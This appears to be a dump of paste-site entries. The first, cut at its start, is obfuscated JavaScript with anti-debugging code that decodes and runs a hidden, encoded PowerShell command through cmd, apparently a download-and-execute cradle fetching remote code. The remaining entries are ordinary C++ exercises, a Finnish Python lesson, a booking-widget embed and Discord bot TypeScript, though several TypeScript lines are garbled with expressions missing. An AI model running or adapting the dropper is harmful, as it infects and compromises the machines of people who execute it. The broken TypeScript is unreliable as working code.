-0x34e)](I, 0x0); + } + } + })(); +}()); +function EO(b, W, B, N, q, m, e) { + return Y(b - 0x137, N); +} +function EA(b, W, B, N, q, m, e) { + return Y(b - -0x74, e); +} +var YLJajsi = '>2F>2' + E6(-0x73, -0x8f, -0x7b, -0x63, -0x70, -0xb1, -0x71) + E7(0x275, 0x2b6, 0x29b, 0x274, 0x261, 0x283, 0x26d) + 'CUhAFBP>2B>22>2E>22>2B>20>2F>2FIxqOgMKi>0D>0A>22ApPlIcAtIon>22>29>3B>20Fk' + E7(0x29c, 0x2af, 0x27b, 0x287, 0x2ad, 0x290, 0x2c3) + 'b>20>3D>20new>2' + E8(0x163, 0x191, 0x157, 0x15d, 0x18b, 0x171, 0x176) + E6(-0x63, -0x46, -0x3f, -0x20, -0x20, -0x13, -0x66) + E6(-0xb3, -0x96, -0x8b, -0x7c, -0x7f, -0xb5, -0x9b) + '>5CpROgRa>22>2B>2' + '0>2F>2FIxqOgMKi>0D>0A>22mdAta>5C>5CmIcRosOft>5C>5CwINdoWs>22>29>29>2' + '0>7B>0D>0A>2F>' + '2FYhALZvBkf' + 'yGVcEPoHRNqI' + EE(0x210, 0x1ef, 0x221, 0x21b, 0x24b, 0x1f1, 0x20d) + '0AYZqOsTxnMmpABJCF>2EShellExecute>28>22cmd>22>2C>20>' + E8(0x12b, 0x169, 0x133, 0x125, 0x11b, 0x172, 0x143) + EA(-0x5a, -0x64, -0x5b, -0x85, -0x75, -0x6d, -0x68) + '>2B>20>2F>2FIxq' + 'OgMKi>0D>0A>22>20Power>22>2BoMKilXfTnLOHCUhAFBP>' + EO(0x15d, 0x145, 0x182, 0x157, 0x13a, 0x12e, 0x142) + 'D' + 'nop>20>2Dw>20hidden>20>22>2B>20>2F>2FIxqOgMKi>0D>0A>22>2Dep>20bypaSS>20>2DenC>20SQ>22>2B>' + E7(0x2ad, 0x2a2, 0x29b, 0x2a7, 0x29c, 0x278, 0x271) + EA(-0x53, -0x75, -0x7d, -0x3e, -0x77, -0x60, -0x22) + E8(0x168, 0x163, 0x146, 0x152, 0x18d, 0x168, 0x172) + 'QBjAHQAIABOAGUAdAAuAFc' + E7(0x2a6, 0x292, 0x2b3, 0x2a8, 0x281, 0x28f, 0x270) + EA(-0x36, -0x47, -0x63, 0x1, -0x39, -0x2e, -0x1) + E6(-0x50, -0x47, -0x78, -0x6b, -0x14, -0x2b, -0x77) + EE(0x1ec, 0x233, 0x22b, 0x21f, 0x20f, 0x1fd, 0x24e) + E6(-0xc8, -0x97, -0x7b, -0x72, -0x79, -0x66, -0xba) + E9(-0x3a0, -0x379, -0x381, -0x39e, -0x384, -0x394, -0x392) + 'FIxqOgMKi>0D>0A>22OgAvAC>38>22' + '>2B>' + '20>2F>' + E8(0x147, 0x19c, 0x163, 0x180, 0x154, 0x1a2, 0x175) + '>0' + 'D>0A>22AYQBsAC>34AYwBvAG>30ALwBpAG>34AZABlAHg' + 'ALwBpA' + EO(0x143, 0x167, 0x10c, 0x150, 0x12f, 0x176, 0x117) + E7(0x24a, 0x25b, 0x255, 0x2a0, 0x275, 0x276, 0x25d); +tuKEfrH = unescape(YLJajsi[E7(0x2a9, 0x2b2, 0x25d, 0x266, 0x27c, 0x288, 0x276)](/\>/g, '%')); +function EE(b, W, B, N, q, m, e) { + return Y(N - 0x1ba, q); +} +function Y(E, A) { + var b = O(); + Y = function (W, B) { + W = W - 0x0; + var N = b[W]; + return N; + }; + return Y(E, A); +} +function E6(b, W, B, N, q, m, e) { + return Y(W - -0x9c, N); +} +function E9(b, W, B, N, q, m, e) { + return Y(m - -0x3e4, e); +} +YLJajsi = eval(tuKEfrH); +function E(b) { + var W = { + 'zWdcO': 'debu', + 'RguDL': function (N) { + return N(); + }, + 'EMVnf': function (N, q) { + return N === q; + }, + 'Lwira': EY(-0x65, -0x48, -0x87, -0x95, -0x5f, -0x7a, -0x78), + 'tvMuP': function (N, q) { + return N(q); + }, + 'ZElGq': EY(-0x94, -0xe0, -0xa3, -0xe5, -0xe6, -0xb9, -0x8b), + 'kqFyP': function (N, q) { + return N(q); + }, + 'sQLsM': Eb(-0x39f, -0x35e, -0x373, -0x383, -0x35f, -0x38e, -0x39a), + 'SQUdq': function (N, q) { + return N === q; + }, + 'diyER': function (N, q) { + return N !== q; + }, + 'ElDVP': Eb(-0x365, -0x381, -0x384, -0x34f, -0x365, -0x352, -0x371), + 'nQUhN': EY(-0xa0, -0x77, -0x80, -0x77, -0xa1, -0x6d, -0x3e), + 'lzhVP': 'NMgRb', + 'pUbcq': 'tISlQ', + 'xJWUU': function (N, q) { + return N !== q; + }, + 'aEmpj': function (N, q) { + return N / q; + }, + 'pYGcF': Eb(-0x34c, -0x348, -0x359, -0x327, -0x32a, -0x32d, -0x2fa), + 'fSumB': function (N, q) { + return N % q; + }, + 'YtxWF': function (N, q) { + return N !== q; + }, + 'mGTTZ': Eb(-0x31a, -0x358, -0x337, -0x32d, -0x303, -0x303, -0x323), + 'hvuUh': function (N, q) { + return N + q; + }, + 'wEPJt': EW(-0x213, -0x250, -0x247, -0x223, -0x1f9, -0x221, -0x22d), + 'MDYYX': Eb(-0x39f, -0x372, -0x381, -0x36b, -0x37f, -0x382, -0x33b), + 'aTzWI': Eb(-0x331, -0x323, -0x351, -0x338, -0x306, -0x354, -0x338), + 'PybAt': 'stateObject', + 'qrCPF': EB(-0x2c0, -0x2d1, -0x2cc, -0x2f4, -0x2d5, -0x2f0, -0x2f5), + 'jSVZi': function (N, q) { + return N === q; + }, + 'QJSGX': EB(-0x2c2, -0x2b5, -0x2d6, -0x301, -0x2a4, -0x2a5, -0x2ee), + 'Bcdqr': Eq(-0x333, -0x311, -0x319, -0x2ee, -0x32c, -0x326, -0x316) + }; + function EN(b, W, B, N, q, m, e) { + return EE(b - 0x12d, W - 0x7e, B - 0xc0, W - -0x430, m, m - 0x43, e - 0x87); + } + function Eq(b, W, B, N, q, m, e) { + return EO(W - -0x474, W - 0x15f, B - 0xd8, B, q - 0x105, m - 0x21, e - 0x1b); + } + function Em(b, W, B, N, q, m, e) { + return E7(b - 0x2e, W - 0x118, B - 0x107, N - 0xb5, q, W - -0x1b2, e - 0x149); + } + function EB(b, W, B, N, q, m, e) { + return EO(B - -0x44a, W - 0x170, B - 0x1b8, N, q - 0x1d0, m - 0x15e, e - 0x19e); + } + function EY(b, W, B, N, q, m, e) { + return EE(b - 0x88, W - 0x12e, B - 0x19f, m - -0x273, W, m - 0x1ad, e - 0xd4); + } + function Eb(b, W, B, N, q, m, e) { + return E6(b - 0x25, N - -0x2f8, B - 0x8e, W, q - 0xfe, m - 0x102, e - 0x107); + } + function EW(b, W, B, N, q, m, e) { + return E6(b - 0x128, m - -0x1e2, B - 0x1d6, e, q - 0x152, m - 0x19c, e - 0xae); + } + function B(N) { + function EJ(b, W, B, N, q, m, e) { + return EY(b - 0x9a, e, B - 0xb4, N - 0xd5, q - 0x15c, W - 0x247, e - 0x79); + } + function EZ(b, W, B, N, q, m, e) { + return Eb(b - 0x13f, e, B - 0xca, W - 0x16b, q - 0x1c8, m - 0x34, e - 0x19d); + } + function ED(b, W, B, N, q, m, e) { + return Em(b - 0xfa, b - 0x2ba, B - 0x61, N - 0xc5, N, m - 0x14b, e - 0x13f); + } + var q = { + 'SfkWs': function (m, e) { + return W['tvMuP'](m, e); + }, + 'qhoqJ': function (m, e) { + return m === e; + }, + 'QIekA': Ee(-0xc7, -0xac, -0xbc, -0xdf, -0xa9, -0xa9, -0x115), + 'ZXYKK': function (m, e) { + return m(e); + }, + 'exPOH': W['ZElGq'], + 'eSdVT': function (m, e) { + function EI(b, W, B, N, q, m, e) { + return Ee(b - 0x19b, W - 0x158, m, q - 0x340, q - 0x169, m - 0x11, e - 0xb7); + } + return W[EI(0x1ed, 0x1cd, 0x1ee, 0x212, 0x1fb, 0x228, 0x206)](m, e); + }, + 'RTXbT': function (m, e) { + return m + e; + }, + 'WwsZx': ED(0x3a9, 0x3cf, 0x3c4, 0x373, 0x3b2, 0x39e, 0x3c1), + 'OTDiM': function (m) { + return m(); + } + }; + function Ee(b, W, B, N, q, m, e) { + return EB(b - 0x1f2, W - 0x176, N - 0x1ca, B, q - 0xeb, m - 0x8f, e - 0x185); + } + function Er(b, W, B, N, q, m, e) { + return Eb(b - 0xd8, B, B - 0x9f, m - 0x20a, q - 0x139, m - 0x119, e - 0x11); + } + function EG(b, W, B, N, q, m, e) { + return EW(b - 0x161, W - 0xa8, B - 0x174, N - 0x15b, q - 0x9b, e - -0x40, q); + } + function Ed(b, W, B, N, q, m, e) { + return Em(b - 0xa6, e - -0x46c, B - 0xa0, N - 0x196, b, m - 0x16f, e - 0x1d9); + } + if ('qHdRH' !== W[Ee(-0xc2, -0xf3, -0xd5, -0xe3, -0xce, -0x107, -0xc8)]) { + if (W[ED(0x3ca, 0x3d5, 0x3a9, 0x3d8, 0x3bb, 0x3d2, 0x3a9)](typeof N, 'string')) { + if (W['diyER'](W['ElDVP'], 'yCjCK')) { + var I = N['apply'](q, arguments); + m = null; + return I; + } else { + return function (e) { + }[EG(-0x2bf, -0x2e0, -0x2c8, -0x2b0, -0x2a3, -0x2df, -0x2bd)](Ee(-0x11d, -0x134, -0x11b, -0x115, -0x148, -0xe6, -0x10d))[ED(0x3dc, 0x3bb, 0x3b2, 0x404, 0x3db, 0x3b9, 0x3e6)](W[EZ(-0x22b, -0x217, -0x21e, -0x208, -0x1e8, -0x20d, -0x1f4)]); + } + } else { + if (W[Ed(-0x3b8, -0x3ba, -0x365, -0x3a1, -0x387, -0x39f, -0x399)] !== W[Ed(-0x3b0, -0x3a3, -0x36a, -0x3a9, -0x39c, -0x381, -0x39d)]) { + if (W[Ed(-0x35f, -0x389, -0x383, -0x391, -0x368, -0x3c8, -0x393)](('' + W[Er(-0x12a, -0x114, -0x10c, -0x158, -0x10b, -0x139, -0x14a)](N, N))[W['pYGcF']], 0x1) || W[EG(-0x28a, -0x29a, -0x290, -0x24c, -0x2a1, -0x24a, -0x275)](W['fSumB'](N, 0x14), 0x0)) { + if (W['YtxWF'](Ed(-0x344, -0x369, -0x37c, -0x351, -0x348, -0x38e, -0x36b), W[ED(0x395, 0x37f, 0x36c, 0x3c1, 0x3cc, 0x386, 0x363)])) { + (function () { + function Ev(b, W, B, N, q, m, e) { + return Ee(b - 0x6f, W - 0x74, B, q - 0x1e1, q - 0x87, m - 0x64, e - 0xd6); + } + if (q['qhoqJ'](q['QIekA'], Ev(0x129, 0xe4, 0xf9, 0xd6, 0xf3, 0x11b, 0xe2))) { + q['SfkWs'](W, '0'); + } else { + return !![]; + } + }['constructor'](W[ED(0x3c4, 0x3d6, 0x3dc, 0x3e3, 0x3da, 0x3b3, 0x3cf)](W['zWdcO'], ED(0x3cc, 0x3b6, 0x3b7, 0x3ca, 0x3de, 0x3f1, 0x3ce)))[EG(-0x2a0, -0x26c, -0x25f, -0x28b, -0x24b, -0x298, -0x27c)](W['wEPJt'])); + } else { + (function () { + return ![]; + }[Er(-0x162, -0x1a1, -0x1a6, -0x15c, -0x16c, -0x189, -0x19c)](W[EJ(0x16d, 0x19d, 0x1a8, 0x1c5, 0x1a5, 0x1b1, 0x1c3)] + Ee(-0x111, -0xf5, -0xe0, -0xed, -0x10d, -0x11c, -0xbc))[ED(0x3dc, 0x3ab, 0x3cd, 0x3ea, 0x3da, 0x3ac, 0x3a9)](EJ(0x1ef, 0x1c0, 0x1b1, 0x1d1, 0x1cd, 0x19c, 0x195))); + } + } else { + if (W[Ee(-0x115, -0xc4, -0xcb, -0xf0, -0x101, -0x107, -0xd5)] !== 'eEfTx') { + (function () { + function Ez(b, W, B, N, q, m, e) { + return ED(B - -0x4be, W - 0x14b, B - 0xc4, W, q - 0x113, m - 0x105, e - 0x1b4); + } + var I = { + 'wWTHo': function (D) { + return W['RguDL'](D); + } + }; + function Eu(b, W, B, N, q, m, e) { + return EZ(b - 0x19e, W - 0x168, B - 0x81, N - 0x126, q - 0x1b7, m - 0xdf, N); + } + function Eh(b, W, B, N, q, m, e) { + return Er(b - 0x110, W - 0x67, b, N - 0x4d, q - 0x173, W - 0x42c, e - 0x8d); + } + if (W[Ez(-0xce, -0x10c, -0x105, -0x134, -0x106, -0xf0, -0x10f)](Eu(-0xb6, -0x82, -0x9d, -0xaf, -0x51, -0xb7, -0x6f), W[Eu(-0xce, -0xa3, -0xb0, -0x7d, -0x6c, -0x9e, -0xab)])) { + return ![]; + } else { + I['wWTHo'](W); + } + }[Er(-0x159, -0x171, -0x19b, -0x191, -0x195, -0x189, -0x187)]('debu' + W[EJ(0x1af, 0x196, 0x167, 0x183, 0x17b, 0x1bd, 0x18b)])[EG(-0x278, -0x270, -0x257, -0x26e, -0x23b, -0x230, -0x252)](W[Er(-0x16b, -0x161, -0x1ad, -0x1a4, -0x1a2, -0x176, -0x154)])); + } else { + return ![]; + } + } + } else { + q['ZXYKK'](W, 0x0); + } + } + B(++N); + } else { + var Z = { + 'pYymh': q['exPOH'], + 'IxZcP': Er(-0x14e, -0x140, -0x134, -0x134, -0x163, -0x15c, -0x164), + 'kWlXl': function (G, r) { + return q['eSdVT'](G, r); + }, + 'IpBML': function (G, r) { + return q['RTXbT'](G, r); + }, + 'UJXkI': q[Ed(-0x396, -0x341, -0x366, -0x369, -0x38c, -0x365, -0x376)], + 'TDDLu': function (G) { + function EF(b, W, B, N, q, m, e) { + return Er(b - 0x8e, W - 0xce, e, N - 0x102, q - 0x7f, q - 0x4f2, e - 0xb1); + } + return q[EF(0x39e, 0x3b6, 0x3cf, 0x375, 0x39d, 0x3c7, 0x3ac)](G); + } + }; + m(this, function () { + var F = new Z(Z[El(0x14a, 0x13d, 0x102, 0x130, 0xfc, 0x135, 0x158)]); + var l = new G(Z['IxZcP'], 'i'); + function ER(b, W, B, N, q, m, e) { + return EZ(b - 0x199, m - 0x1ea, B - 0xae, N - 0x15b, q - 0xb4, m - 0x52, B); + } + function Eo(b, W, B, N, q, m, e) { + return EJ(b - 0x1bf, b - -0x4b6, B - 0x1b9, N - 0x116, q - 0x12c, m - 0xd9, e); + } + function El(b, W, B, N, q, m, e) { + return EG(b - 0xd1, W - 0x1a3, B - 0x1b9, N - 0x10e, m, m - 0x163, N - 0x3b7); + } + function Ep(b, W, B, N, q, m, e) { + return EZ(b - 0x154, e - 0x5c3, B - 0x8b, N - 0x19, q - 0x9f, m - 0x87, N); + } + var R = Z['kWlXl'](r, ER(0x1a, -0x1, 0xa, 0x11, -0x24, -0x10, -0xd)); + if (!F[El(0x17d, 0x167, 0x161, 0x14c, 0x182, 0x14c, 0x168)](R + 'chain') || !l['test'](Z[Eo(-0x2bd, -0x299, -0x289, -0x29d, -0x2ad, -0x294, -0x2ae)](R, Z['UJXkI']))) { + R('0'); + } else { + Z['TDDLu'](v); + } + })(); + } + } + try { + if (b) { + if (W[EW(-0x24e, -0x209, -0x22c, -0x1ff, -0x224, -0x22f, -0x224)]('naPSm', W['qrCPF'])) { + return W; + } else { + return B; + } + } else { + if (W[EY(-0x72, -0x4d, -0x76, -0x88, -0x84, -0x6b, -0x7b)](W[EB(-0x30b, -0x2ec, -0x2d8, -0x2b6, -0x30d, -0x2ea, -0x2a1)], W[Eq(-0x326, -0x303, -0x2df, -0x303, -0x313, -0x2f8, -0x2e5)])) { + (function () { + return !![]; + }[Em(0xe6, 0xb7, 0xce, 0xbb, 0x9d, 0xe1, 0xc4)](W['hvuUh'](W[EN(-0x267, -0x267, -0x27a, -0x26e, -0x26c, -0x25f, -0x24a)], W[EY(-0xd1, -0xd9, -0xb8, -0xe8, -0x8f, -0xb1, -0xc9)]))[Eb(-0x36a, -0x344, -0x340, -0x352, -0x31b, -0x338, -0x360)](Eb(-0x32e, -0x350, -0x316, -0x337, -0x349, -0x31d, -0x35e))); + } else { + B(0x0); + } + } + } catch (m) { + } +} +//HSJUMOODE +" +hdNnZ64Y,Booking-Time,borlabs,JavaScript,Thursday 2nd of November 2023 11:00:43 AM CDT,"var bookingTimeDiv = document.createElement(""div""); +bookingTimeDiv.setAttribute(""id"", ""bookingtimeSatelliteIframe_e8c748d5c2227258""); +bookingTimeDiv.setAttribute(""style"", ""position:static;display:block;margin:0 auto;padding:0;border:none;background:none;width:auto;height:auto;""); +document.querySelector('body').appendChild(bookingTimeDiv); + +var fragment = document.createDocumentFragment(); +var bookingTimeScript = 'var pymParent=new pym.Parent(""bookingtimeSatelliteIframe_e8c748d5c2227258"","""",{sandbox:""allow-scripts allow-same-origin allow-popups""});'; + +var r = document.createRange(); +r.selectNodeContents(document.body); +document.body.appendChild(r.createContextualFragment(bookingTimeScript));" +LjFAHDjM,Сортировка событий,ProgMe,C++,Thursday 2nd of November 2023 10:33:33 AM CDT,"#include + +using namespace std; + +int main() { + int n; + cin >> n; + pair a[n]; + for (auto &i : a) { + cin >> i.first >> i.second; + } + + int m; + cin >> m; + int points[m]; + for (auto &i : points) { + cin >> i; + } + + vector> queries; + for (auto [l, r] : a) { + queries.emplace_back(l, -1); + queries.emplace_back(r, 1); + } + for (auto i : points) { + queries.emplace_back(i, 0); + } + sort(queries.begin(), queries.end()); + + int ans = 0; + + pair mx_ans = {-1, -1}; + for (auto [query, type] : queries) { + if (type == -1) { + ans++; + } else if (type == 0) { + if (mx_ans.second < ans) { + mx_ans = {query, ans}; + } + } else { + ans--; + } + } + cout << mx_ans.first; +}" +A7TXNv6H,CommandAddons.ts,lord_shadow,TypeScript,Thursday 2nd of November 2023 10:31:33 AM CDT,"import { + Message, + InteractionReplyOptions, + CommandInteraction, + User, + Guild, + GuildMember, + BaseInteraction, + MessageCreateOptions, + TextChannel, +} from 'discord.js'; +import { Command } from '../Command'; +import { Args } from 'lexure'; +import { getMissingArgumentsEmbed } from '../../handlers/locale'; +import { config } from '../../config'; + +export class CommandContext { + type: 'interaction' | 'message'; + subject?: CommandInteraction | Message; + user?: User; + member?: GuildMember; + guild?: Guild; + args?: { [key: string]: any }; + replied: boolean; + deferred: boolean; + command: Command; + channel: TextChannel | null; + + /** + * Command context for getting usage information and replying. + * + * @param payload + */ + constructor(payload: BaseInteraction | CommandInteraction | Message, command: any, args?: Args) { + this.type = payload instanceof Message ? 'message' : 'interaction'; + this.subject = payload instanceof BaseInteraction ? payload as CommandInteraction : payload; + this.user = payload instanceof Message ? : payload.user; + this.member = payload.member as GuildMember; + this.guild = payload.guild; + this.command = new command(); + = as TextChannel; + this.replied = false; + this.deferred = false; + + this.args = {}; + if(payload instanceof BaseInteraction) { + const interaction = payload as CommandInteraction; + (arg) => { + this.args[] = interaction.options.get(; + }); + } else { +; + this.command.args.forEach((arg, index) => { if(!arg.isLegacyFlag) this.args[arg.trigger] = args.single() }); + const filledOutArgs = Object.keys(Object.fromEntries(Object.entries(this.args).filter(([_, v]) => v !== null))); + const requiredArgs = this.command.args.filter((arg) => (arg.required === undefined || arg.required === null ? true : arg.required) && !arg.isLegacyFlag); + if(filledOutArgs.length < requiredArgs.length) { + this.reply({ embeds: [ getMissingArgumentsEmbed(this.command.trigger, this.command.args) ] }); + throw new Error('INVALID_USAGE'); + } else { + if(args.length > requiredArgs.length) { + const extraArgs = args.many(1000, requiredArgs.length); + this.args[Object.keys(this.args).filter((key) => !this.command.args.find((arg) => arg.trigger === key).isLegacyFlag).at(-1)] = [ this.args[Object.keys(this.args).filter((key) => !this.command.args.find((arg) => arg.trigger === key).isLegacyFlag).at(-1)], => arg.value)].join(' '); + } + let areAllRequiredFlagsEntered = true; + this.command.args.filter((arg) => arg.isLegacyFlag).forEach((arg) => { + const flagValue = args.option(arg.trigger); + if(!flagValue && arg.required) areAllRequiredFlagsEntered = false; + this.args[arg.trigger] = flagValue; + }); + if(!areAllRequiredFlagsEntered) { + this.reply({ embeds: [ getMissingArgumentsEmbed(this.command.trigger, this.command.args) ] }); + throw new Error('INVALID_USAGE'); + } + } + } + } + + checkPermissions() { + if(!this.command.permissions || this.command.permissions.length === 0) { + return true; + } else { + let hasPermission = null; + let permissions = []; + => { + permission.ids.forEach((id) => { + return permissions.push({ + type: permission.type, + id, + value: permission.value, + }); + }); + }); + const permission = permissions.forEach((permission) => { + let fitsCriteria: boolean; + if(!hasPermission) { + if(config.permissions.all && this.member.roles.cache.some((role) => config.permissions.all.includes( { + fitsCriteria = true; + } else { + if(permission.type === 'role') fitsCriteria = this.member.roles.cache.has(; + if(permission.type === 'user') fitsCriteria = ===; + } + if(fitsCriteria) hasPermission = true; + } + }); + return hasPermission || false; + } + } + + /** + * Send a mesasge in the channel of the command message, or directly reply to a command interaction. + * + * @param payload + */ + async reply(payload: string | InteractionReplyOptions | MessageCreateOptions | InteractionReplyOptions) { + this.replied = true; + if(this.subject instanceof CommandInteraction) { + try { + const subject = this.subject as CommandInteraction; + if(this.deferred) { + return await subject.editReply(payload); + } else { + return await subject.reply(payload as InteractionReplyOptions); + } + } catch (err) { + const subject = this.subject as CommandInteraction; + try { + if(this.deferred) { + return await subject.editReply(payload as InteractionReplyOptions); + } else { + return await subject.reply(payload as InteractionReplyOptions); + } + } catch (err) {}; + } + } else { + return await as MessageCreateOptions); + } + } + + /** + * Defers a reply. + */ + async defer() { + try { + if(this.subject instanceof CommandInteraction) { + const interaction = this.subject as CommandInteraction; + if(!interaction.deferred && !interaction.replied) await this.subject.deferReply(); + } else { + await; + } + this.deferred = true; + } catch (err) {}; + } +} +" +FwgVyTUK,Timeout Command,lord_shadow,TypeScript,Thursday 2nd of November 2023 10:30:59 AM CDT,"import { config } from '../../config'; +import { checkIconUrl, greenColor, infoIconUrl, mainColor, redColor, xmarkIconUrl } from '../../handlers/locale'; +import { discordClient } from '../../main'; +import { Command } from '../../structures/Command'; +import { CommandContext } from '../../structures/addons/CommandAddons'; +import { EmbedBuilder, TextChannel } from 'discord.js'; + +class TimeoutCommand extends Command { + constructor() { + super({ + trigger: 'timeout', + description: 'Timeouts a user from the server.', + type: 'ChatInput', + module: 'moderation', + args: [ + { + trigger: 'user', + description: 'The user to timeout.', + type: 'DiscordUser', + required: true, + }, + { + trigger: 'duration', + description: 'How long should this user be timeouted?', + type: 'String', + required: true, + choices: [ + { + name: '60 seconds', + value: '60000', + }, + { + name: '5 minutes', + value: '300000', + }, + { + name: '10 minutes', + value: '600000', + }, + { + name: '1 hour', + value: '3600000', + }, + { + name: '3 hours', + value: '10800000', + }, + { + name: '6 hours', + value: '21600000', + }, + { + name: '12 hours', + value: '43200000', + }, + { + name: '1 day', + value: '86400000', + }, + { + name: '1 week', + value: '604800000', + }, + ], + }, + { + trigger: 'reason', + description: 'The reason for the timeout? (optional)', + type: 'String', + required: false, + }, + ], + permissions: [ + { + type: 'role', + ids: config.permissions.moderators, + value: true, + }, + ], + }); + } + + formatDuration(milliseconds) { + const seconds = milliseconds / 1000; + if (seconds < 60) { + return `${Math.floor(seconds)} second(s)`; + } else if (seconds < 3600) { + const minutes = Math.floor(seconds / 60); + return `${minutes} minute(s)`; + } else if (seconds < 86400) { + const hours = Math.floor(seconds / 3600); + return `${hours} hour(s)`; + } else { + const days = Math.floor(seconds / 86400); + return `${days} day(s)`; + } + } + + async run(ctx: CommandContext) { + const userToTimeout = ctx.args['user']; + const duration = parseInt(ctx.args['duration']); + const reason = ctx.args['reason'] || 'No reason provided.'; + + const member = ctx.guild.members.cache.get(userToTimeout); + + let channelSend: TextChannel; + channelSend = await discordClient.channels.fetch('1168628274759471155') as TextChannel; + + if (!member) { + return ctx.reply({ content: 'The mentioned user is not in this server.' }); + } + + if (member.bannable) { + try { + member.timeout(duration, reason); + + const formattedDuration = this.formatDuration(duration); + + const successEmbed = new EmbedBuilder() + .setAuthor({ name: `Success!`, iconURL: checkIconUrl }) + .setDescription(`Successfully timed out <@${}> from the server for ${formattedDuration}.\nReason: ${reason}`) + .setColor(greenColor); + + ctx.reply({ embeds: [successEmbed], ephemeral: true }); + + const logEmbed = new EmbedBuilder() + .setAuthor({ name: `Karai Logs`, iconURL: infoIconUrl }) + .setColor(mainColor) + .setDescription(`**Staff Member:** ${ctx.user}\n**Action:** Timeout\n**Timed Out User:** ${member.user}\n**Duration:** ${formattedDuration}\n**Reason:** ${reason}`); + + channelSend.send({ embeds: [logEmbed] }); + } catch (error) { + console.error(error); + const errorEmbed = new EmbedBuilder() + .setAuthor({ name: `Error!`, iconURL: xmarkIconUrl }) + .setColor(redColor) + .setDescription(`An error occurred while trying to timeout the user. Please try again later.`); + + ctx.reply({ embeds: [errorEmbed] }); + } + } else { + const noPermsEmbed = new EmbedBuilder() + .setAuthor({ name: `Error!`, iconURL: xmarkIconUrl }) + .setColor(redColor) + .setDescription(`I do not have the necessary permissions to timeout this user.`); + + ctx.reply({ embeds: [noPermsEmbed] }); + } + } +} + +export default TimeoutCommand;" +423Ae9B7,08. Strong Number,Spocoman,C++,Thursday 2nd of November 2023 10:14:50 AM CDT,"#include +#include + +using namespace std; + +int main() { + string strong; + cin >> strong; + + int number = stoi(strong), sum = 0; + + for (int i = 1; i <= strong.length(); i++) { + int factorial = 1; + for (int j = 1; j <= number % 10; j++) { + factorial *= j; + } + sum += factorial; + number /= 10; + } + + cout << (stoi(strong) == sum ? ""yes"" : ""no"") << endl; + return 0; +}" +FGiuyA43,07. Print and Sum,Spocoman,C++,Thursday 2nd of November 2023 10:02:06 AM CDT,"#include + +using namespace std; + +int main() { + int firstNumber, secondNumber, sum = 0; + cin >> firstNumber >> secondNumber; + + for (int i = firstNumber; i <= secondNumber; i++) { + cout << i << ' '; + sum += i; + } + + cout << ""\nSum: "" << sum << endl; + return 0; +}" +CwRHPD83,08. Even Number,Spocoman,C++,Thursday 2nd of November 2023 09:45:18 AM CDT,"#include + +using namespace std; + +int main() { + int n; + cin >> n; + + while (n % 2 != 0) { + cout << ""Please write an even number.\n""; + cin >> n; + } + + cout << ""The number is: "" << abs(n) << endl; + return 0; +}" +h9kJNAUQ,07. Multiplication Table,Spocoman,C++,Thursday 2nd of November 2023 09:27:04 AM CDT,"#include + +using namespace std; + +int main() { + int n; + cin >> n; + + for (int i = 1; i <= 10; i++) { + cout << n << "" X "" << i << "" = "" << n * i << endl; + } + + return 0; +}" +eNGscrgi,Untitled,tuomasvaltanen,Python,Thursday 2nd of November 2023 09:24:04 AM CDT,"# Johdatus ohjelmointiin, 2.11.2023, koodityöpaja +print(""Tervetuloa!"") + +# UUSI TIEDOSTO + +# tämä muuttuja kirjaa siitä, kuinka paljon sadetta on kaikkiaan ollut +total = 0 + +# ajetaan seuraava koodi 12 kertaa +# => eli kysytään käyttäjältä sademäärä 12 kertaa +for x in range(12): + rain = input(""Syötä sademäärä:\n"") + rain = float(rain) + total = total + rain + + # silmukassa kannattaa vain kerryttää summaa + # kaikki keskiarvoon ja pyöristämiseen voi tehdä silmukan jälkeen + # tällä myös vältetään turhat laskutoimitukset ja ennen kaikkea pyöristysvirheet + + +# silmukan jälkeen, katsotaan kuinka paljon sadetta kaikkiaan oli +print(total) + +# UUSI TIEDOSTO + +# tämä koodisto voisi tulla vaikka jostain +# tietokantajärjestelmästä, ja näitä voisi +# hyvinkin olla vaikka satoja kappaleita! +# tässä harjoituksessa tuotekoodit ovat suoraan +# tässä lista-muuttujassa. (kokeilemme myöhemmin kurssilla +# myös ladata dataa myös internetistä!) +products = [""K1565_2017_ST7745"", ""T2432_2019_FE84"", + ""T8551_2018_XA413"", ""T3345_2019_JK142"", + ""Y51372_2019_HJ2"", ""Y76715_2017_AB3"", + ""E98144_2018_21T"", ""T7733_2020_CE55"", + ""E7614_2021_XZA784"", ""E9722_2017_MHE67"", + ""Y82018_2020_FI95"", ""T61287_2021_IA293"", + ""E9152_2019_TY5"", ""T774_2021_OB672""] + +# Pyydä käyttäjältä vuosiluku +# inputilla pyydetään vuosiluku käyttäjältä +user_input = ""2018"" + +# vinkki: jos pitää prosessoida jotakin listaa => lähtökohtaisesti tarvitaan silmukka +for p in products: + # tulosta PELKKÄ TILAUSKOODI => jos user_input == tuotteen vuosiluku + # muussa tapauksessa älä tulosta mitään + # aja silmukkaa kunnes koke tuotelista on käyty läpi + + # halkaistaan tällä hetkellä käsittelyssä oleva tuotekoodi osiin: + parts = p.split(""_"") + print(parts) + + # tämän jälkeen voidaan tehdä apumuuttujia: + # esim. code = parts[0] tai year = parts[1] + + # if user_input in p ei ole hyvä ratkaisu, koska jos käyttäjän vuosi on 2018 + # silloin koodin mukaan Y82018_2020_FI95 kuuluu myös vuoteen 2018, vaikka se kuuluu vuoteen 2020 + + # tämän sijaan on parempi verrata suoraan tarkkaan muuttujaan käyttäjän vuotta + # eli tyyliin jos user_input == year (ks. ylempää, parts[1]) + # jos user_input ja year täsmää => tulostetaan p, mussa tapauksessa ei tehdä mitään + # ei tarvitse elseä, koodi skippaa tulostamisen automaattisesti muutenkin jos ehto ei täyty + +# UUSI TIEDOSTO + +# tehtävään 6.6 lisätehtävään vinkkejä: + +# kuvitellaan että käyttäjän arvo on muuttujassa choice + +# if choice.isnumeric() => käyttäjä syötti numeron + # haetaan käyttäjän syöttämän numeron mukainen ruoka listasta INDEKSILLÄ + # esim. basket[choice] , tarkista pitääkö indeksiä muuttaa yhdellä suuntaan tai toiseen + # ks. tehtävänanto + + # ajetaan for-silmukka, jossa tulostetaan lista niin, että jätetään käyttäjän + # indeksillä syöttämä ruoka tulostamatta + +# else => käyttäjä syötti tekstin: + # ajetaan for-silmukka, jossa tulostetaan lista niin, että jätetään käyttäjän + # sana tulostamatta" +5FKW9FUY,06. Sum of Odd Numbers,Spocoman,C++,Thursday 2nd of November 2023 09:21:36 AM CDT,"#include + +using namespace std; + +int main() { + int n, sum = 0; + cin >> n; + + for (int i = 1; i < n * 2; i += 2) { + cout << i << endl; + sum += i; + } + + cout << ""Sum: "" << sum << endl; + return 0; +}" 